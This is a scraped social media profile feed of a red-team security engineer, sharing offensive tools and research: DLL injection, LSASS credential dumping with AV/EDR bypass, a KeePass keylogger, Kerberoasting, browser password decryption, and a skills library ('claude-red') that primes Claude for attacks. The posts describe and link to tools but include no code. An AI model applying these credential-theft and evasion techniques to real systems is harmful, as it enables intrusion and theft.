Olivia
Online
int21h
@RedTeamEric1
Red Teamer. Code hacker, Security Engineer, and OSINT user. Arch Linux and Tron fanatic!! My opinions do not reflect my employers.
127.0.0.1
Joined August 2019
2K Following
621 Followers
2K Posts
Pinned Tweet
I have been extremely fortunate this year. To have met one of the best teammates I've ever worked with who also spent a lot of time with me teaching me, challenging me, and answering questions regardless of how dumb over the holidays. I have no idea how to show how greatful I am.
Wormable RCE in Windows DNS. Wormable RCE in SMBv3. Linux kernel exploitation via eBPF and io_uring. Windows 11 kernel LPE. Android kernel exploitation bypassing DAC, SELinux, and Knox.
Full exploit chains with working PoCs. Heap grooming. ASLR bypass. CFG bypass. Type confusion. Kernel privilege escalation across three operating systems.
All free. All published with full writeups.
https://t.co/txZSShQlnW
Author: @chompie1337
#ExploitDevelopment #ReverseEngineering #InfoSec
Staged DLL Injection via SMB
This is a custom tool that performs staged DLL injection over SMB.
How it works:
•It attaches to a trusted remote process.exe.
•Allocates memory inside the target process.
•Stages the shellcode directly into that allocated memory remotely via SMB.
•Creates a thread to execute the shellcode.
This code is provided solely for educational and research purposes.
GitHub: https://t.co/itRoPeVWEr
Wrote a blogpost about how you can use the Windows server 2003 source code as a red teamer to make your tools look less like tools.
I also go over and map out the main/important files and practical examples of using it to augment MS-*/RFC specs: https://t.co/HfUYBAdCJJ
goLoL - a Windows host scanner that finds LOLBAS binaries present on the current machine and lists techniques you can run at your current privilege level with MITRE ATT&CK mappings and example commands https://t.co/0CIRynqovI
RT0x01 Red Teaming Initial Access : https://t.co/riBagVAvD9 highlighted why phishing attacks are still #1. also why bug bounty hunters becomes beast when it comes to Exploit Public Facing Application and chaining them to get into the system. btw can't able to cover all
New Windows privilege-escalation primitive just dropped.
GreenPlasma is a minimal PoC that forces creation of an arbitrary section object inside any directory writable by SYSTEM via CTFMON’s named-object cache.
Let me break it down for you:
shipping: WinSSHound
maps SSH access in AD as BloodHound paths. because Windows OpenSSH cheerfully ignores your "Deny Logon" GPOs (pre-2025) and on a default sshd_config every Authenticated User in the domain can walk right in. Why? Because Microsoft.
https://t.co/ONXuguz7r3
net_use - a modernized BOF ported from @TrustedSec's
SA BOF repo, it is used to add, list, or remove mapped drives via the Windows MPR API. og functionality is preserved just added improved memory handling to reduce crashes during runtime
In monitored environments, spawning net.exe or PowerShell for drive mapping can create unnecessary telemetry.
find it here:
https://t.co/fTezAomOi1
there seems to be some fun debate about Edge and it's storing all the passwords in RAM in clear text, vs chrome which stores the passwords upon use (e.g. one at a time) in RAM....
but chrome also stores the passwords in an SQL Lite file and the keys are protected by DPAPI!
Guess what a userland process can do?
It can get the keys! It can decrypt! Now you might be thinking... that's not true.... so let's see: to D LAB!
morphkatz - Polymorphic PE rewriter for Windows x64 , rewrites binaries into semantically identical but byte-different variants https://t.co/FvYcpCVSqF
DeadMatter
Extracts LSASS credentials from memory dumps. Lightweight. Can be used to bypass AV/EDR. Usually is paired with DumpIt as both of them don't need GUI.
Tested with Microsoft Defender and Kaspersky
https://t.co/phV5wNPfBZ
@three_cube @_aircorridor #edr #apt #redteam
A BOF designed to inspect processes, memory, and addresses https://t.co/Y9oE58G7Ri
Targeted Keberoasting with NetExec🔥
If you have Write privileges over a user, you can temporarily add an SPN to your target user, request the service ticket, and then remove the SPN. Voilà: a crackable hash without interfering with potentially critical users. Made by @azoxlpf🚀
claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.mdfile that primes Claude with expert-level methodology for a specific attack surface from SQLi to shellcode, EDR evasion to exploit development.
Resource: https://t.co/0XvEqoqPfv
A Rust dev just killed Headless Chrome.
It's called Obscura. The open-source headless browser purpose-built for AI agents and scrapers at scale.
Chrome vs Obscura:
- Memory: 200MB+ → 30MB
- Binary: 300MB+ → 70MB
- Page load: 500ms → 85ms
- Startup: 2s → Instant
- Anti-detect: None → Built-in
Single binary. No Node, no Chrome, no dependencies.
Stealth mode is brutal:
→ Per-session fingerprint randomization (GPU, canvas, audio, battery)
→ 3,520 tracker domains blocked by default
→ navigator.webdriver masked to match real Chrome
→ Native function masking so detectors can't sniff it out
Drop-in replacement for Puppeteer and Playwright over CDP. Zero code changes.
If you run agents or serious scraping at scale, this repo prints money.
100% Opensource.
If you like BloodHound and AD Hacking let me introduce you to BloodBash
No web front end
No neo4j
No complexity
Collect your AD artifacts with Sharphound
Run `BloodBash ./pathToSharphoundOutput`
That's it!
https://t.co/9b6EBfeiVP
Suspicious MFA authentication approval was added to Entra ID risk protections.
Limited to P2 customers 😢
KeeLog
Async BOF that captures the KeePass master password by monitoring for the unlock prompt window. When a locked KeePass database is detected, a low-level keyboard hook is installed and keystrokes are captured until the prompt window disappears by being submitted, cancelled or closeed. The captured buffer is then returned to the operator and automatically reconstructed into the master password
https://t.co/wKuVoCU0h1
#redteam
How well do you really understand what's happening inside a #Kerberos exchange? In our latest blog, @codewhisperer84 breaks down the full authentication flow and demonstrates how to interact with every stage using the #Titanis toolset. Read it now! https://t.co/QfvnCt9C0T
Fresh research from the team (@vkamluk / @juanandres_gs) - this one goes back quite awhile!
fast16 | Mystery ShadowBrokers Reference Reveals High-Precision Software Sabotage 5 Years Before Stuxnet
https://t.co/cR83vHEzWo
Most Popular Users
Elon Musk 
@elonmusk
240.5M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.4M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.5M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
72.9M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.7M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.4M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.6M followers